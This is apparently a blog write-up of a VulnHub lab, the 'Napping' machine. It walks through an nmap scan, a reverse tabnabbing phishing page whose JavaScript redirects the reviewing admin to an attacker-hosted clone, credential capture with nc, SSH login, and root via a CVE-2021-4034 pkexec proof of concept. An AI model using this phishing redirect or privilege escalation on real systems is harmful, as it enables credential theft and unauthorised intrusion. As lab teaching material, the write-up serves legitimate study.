Vulnhub_Napping

d588a764d647c10967b17cd9fe6244fd.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.76
napping:192.168.31.47

信息收集

使用Nmap探测目标主机发现开放22、80两个端口

nmap -A -p- 192.168.31.47

9be2e5bd6d2943cc6b7360811db57d66.png
访问80端口发现是一个登录页和一个注册页
b5bb416530fbceb03a885322785fba5b.png
b62af5a67843dbfbd94b8b7cb6a08003.png
查看这两个网页的源码没有发现有价值的信息
a5cd7f4aed628acdb91514b6ab19a046.png
f4a2c22a107164db6fabda241fb42625.png
尝试注册一个账户,登录后发现存在一个输入框
7ad9cbfb3d8a8d34081d0550bd396714.png
输入后会生成一个超链接点击会进行跳转
7099740e22da55f885968b0b87bf5c2d.png
根据网页的描述,在输入一个网址之后,管理员会进行审核,且这种生成的URL容易存在tabnabbing攻击
6119d45c6d08e3b10c37806e2aff0ddb.png

漏洞利用

首先从真网站下载一个网页

wget http://192.168.31.47/index.php

ee15d65c32dfc00cb021ad9f9ab5a4eb.png
然后再创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html)

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
</script>
</body>
</html>

然后在网页目录下使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口,在正常网页中填写构造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码
ba76e946232e4af6891d2a9f24d9410c.png
使用这个密码登录web界面,发现密码错误
264108aa9d092544528d86b6ce244cd2.png
然后尝试ssh登录,发现可以登录成功
b6238c940c02a26de957e353a957c4d7.png
查看daniel用户的家目录没有发现有用的信息
e9a622e6045ccaf5f3409167b2b67ed3.png
然后查看adrian用户家目录下存在三个文件
53d0af15dbd548d69e06f96bb9a7490e.png
第一个是判断网站是否正常启动,并打印时间
fcd9fbfc8b3b31ceabf7a27df65216c0.png
这个文件为query.py脚本执行写入的log文件
90c6f71757daaae026264714624e7e4c.png
查看user.txt发现没有权限
8182a69e8a7e228188f9f7215a1c3a0d.png

提权

查看系统版本分析该网站可能存在CVE-2021-4034 polkit的pkexec本地权限提升漏洞
8c2a044f0499b53b18bfca0b5ee079e2.png
然后查看gcc是否存在和版本号
c9683b2f7f22e4ab5507357928785240.png
将cve-2021-4034漏洞的poc下载到服务器后,使用gcc进行编译
680fa475f15d09f6d068c2bd2369638f.png
查看编译后文件
704b5408bf0eae803c7bf2c86ef263fb.png
执行编译文件获得root权限
b1cee22796104479112b9a8e204d8e5b.png
查看flag
b444fa19042ca03a2c75133c7375fc06.png

加入我的星球

38f73dc42696c3cab7891c1b0a265ffd.png

下方查看历史文章

859edc229c1a3d8d74cbb2516e05f9ab.png

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

2e6fbb83983c76fc4c6035bb2567d9c9.png

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值